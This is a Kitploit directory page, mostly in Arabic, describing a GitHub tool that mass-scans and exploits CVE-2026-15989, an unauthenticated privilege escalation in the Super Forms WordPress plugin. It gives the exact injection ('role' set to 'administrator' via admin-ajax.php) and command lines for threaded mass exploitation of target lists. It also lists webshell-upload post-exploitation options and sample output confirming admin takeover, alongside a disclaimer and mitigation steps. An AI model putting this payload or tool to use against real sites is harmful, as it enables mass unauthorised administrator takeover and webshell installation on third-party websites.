Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-15989 — ماسح ضخم واستغلال لـ CVE-2026-15989، تصعيد الصلاحيات غير المصادق عليه في Super Forms <= 6.3.316 الذي ينشئ حسابات مسؤول عبر معامل role. | Kitploit
أدوات/GitHubGitHub/fl0ydsec/cve-2026-15989
تصعيد الامتيازاتماسحات الثغرات الأمنيةتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراق
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

ماسح ضخم واستغلال لـ CVE-2026-15989، تصعيد الصلاحيات غير المصادق عليه في Super Forms <= 6.3.316 الذي ينشئ حسابات مسؤول عبر معامل role.

منذ 6س 10دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-15989 — Super Forms ≤ 6.3.316 — إثبات استغلال تصعيد الصلاحيات دون مصادقة

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — تصعيد صلاحيات دون مصادقة عبر معامل role في إضافة Register & Login المميزة.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 نظرة عامة على الثغرة

AttributeDetails
CVE IDCVE-2026-15989
Chainregistration form → 'role' in $other_userdata → wp_insert_user(role=administrator) → ADMIN
Severity🔴 CRITICAL (CVSS 9.8)
TargetSuper Forms – Drag & Drop Form Builder + premium Register & Login add-on
Affected≤ 6.3.316 (core) — vulnerable add-on builds (v1.x)
Fixed6.3.317
Authentication RequiredNone

🔍 الوصف التقني

تقوم الإضافة بتعيين دور المستخدم الجديد من إعدادات النموذج ($userdata['role'] = $settings['register_user_role'])، ثم تمر عبر $other_userdata — الذي يحتوي على 'role' — وتستبدل أي مفتاح بالقيمة المُرسلة من العميل ($data['role']['value']) قبل استدعاء wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

الإصلاح (6.3.317): إزالة 'role' من القائمة البيضاء + get_safe_public_registration_role() (fail-closed).

بحث أصلي — بروتوكول الإرسال المزدوج: غيّر النواة البروتوكولات في الإصدار v5.0.0.

CoreActionData formatNonce
4.xsuper_send_emailnested fields (data[role][value]=...)none (checks commented out)
5.x/6.xsuper_submit_formJSON stringsf_nonce via super_create_nonce

تختار الأداة البروتوكول تلقائيًا بناءً على الإصدار المكتشف.


🚀 الاستخدام

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OptionDescription
--list FILEOne target per line; URL|form_id or URL|form_id=ID,email=X per line
-u/--target, --portSingle target
--threads, --timeout, --no-dedupMass mode tuning
--forceFire the payload even without a detected registration form
--only-hits / --quietTrees only for confirmed hits / minimal output
--resetverify-mode completion via lost-password (operator pastes the reset link)
--only-loginSkip registration; log in and check the role via users/me
--login / --rceReal-target post-exploitation: login proof / webshell plugin upload
-k/--insecureIgnore TLS

📊 المخرجات

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — الأهداف المؤكدة فقط (ts|url|status|detail، مع اسم المستخدم/كلمة المرور)
  • شريط مع ETA + عدّادات لكل حالة؛ كل مرحلة تطبع السبب الحقيقي عند الفشل (WAF، انهيار، نموذج تسجيل دخول فقط، بروتوكول خاطئ...)

⚙️ الميزات

  • بروتوكول مزدوج (4.x nested-data / 5+ JSON+nonce) — يُختار تلقائيًا حسب الإصدار
  • اكتشاف الإصدار: readme.txt Stable tag + common.js?ver=؛ فحص الإضافة + إصدارها الخاص
  • اكتشاف نموذج التسجيل: المسارات الشائعة + sitemap.xml/wp-sitemap.xml/sitemap_index + روابط الصفحة الرئيسية
  • التعبئة التلقائية للحقول المطلوبة (بما في ذلك المخفية/الشرطية)
  • "already exists" → إثبات تسجيل دخول مباشر للحساب الموجود
  • التحكم في الانهيار: إعادة إرسال النموذج بدون الدور المُحقن للتمييز بين مشاكل الخادم والانهيارات الناتجة عن الحقن
  • إثبات صلاحيات المسؤول الموثوق عبر /wp-json/wp/v2/users/me?context=edit (بديل: users.php / dashboard)

📁 هيكل الملفات

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ إخلاء المسؤولية

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ التخفيف

  1. قم بتحديث Super Forms إلى 6.3.317 (أو أحدث) وقم بتدوير أي بيانات اعتماد مسربة
  2. حافظ على تحديث إضافة Register & Login (لديها دورة إصدار خاصة بها)
  3. قم بإزالة/تعطيل نماذج التسجيل المنشورة عندما لا تكون مطلوبة
  4. راجع مستخدمي wp-admin/ بحثًا عن حسابات مسؤول غير متوقعة

👤 المؤلف

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

تنزيل الأداة